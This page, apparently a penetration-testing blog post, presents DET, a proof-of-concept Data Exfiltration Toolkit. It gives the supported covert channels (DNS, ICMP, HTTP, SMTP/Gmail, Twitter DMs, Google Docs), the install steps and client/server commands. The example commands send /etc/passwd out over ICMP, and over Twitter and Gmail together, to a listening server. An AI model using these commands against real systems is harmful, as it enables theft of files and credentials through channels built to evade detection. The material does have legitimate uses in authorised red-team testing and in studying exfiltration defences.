Footprinting, Hacking, Penetration Testing

Data Exfiltration using single or multiple channels

DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time. The idea was to create a generic toolkit to plug any kind of protocol/service.

Features
So far, DET supports multiple protocols, listed here:
> HTTP(S)
> ICMP
> DNS
> SMTP/IMAP (eg. Gmail)
> Raw TCP
> PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))
> Encryption (eg. AES-256)

And other “services”:
> Google Docs (Unauthenticated)
> Twitter (Direct Messages)

Usage

det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]
 
Data Exfiltration Toolkit (SensePost)
 
optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f / etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d / etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode

Installation

Download from Github.

git clone https://github.com/sensepost/DET.git /opt/DET

Then:

pip install -r requirements.txt --user

Examples

ICMP
Server side

python det.py -c /config.json -p icmp -L

Client side

python det.py -f / etc/passwd -p icmp -c ./config.js

Combining two channels(Gmail/Twitter)
Server side

python det.py -L -c ./config.json -p twitter,gmail

Client side

python det.py -f / etc/passwd -c ./config.json -p twitter,gmail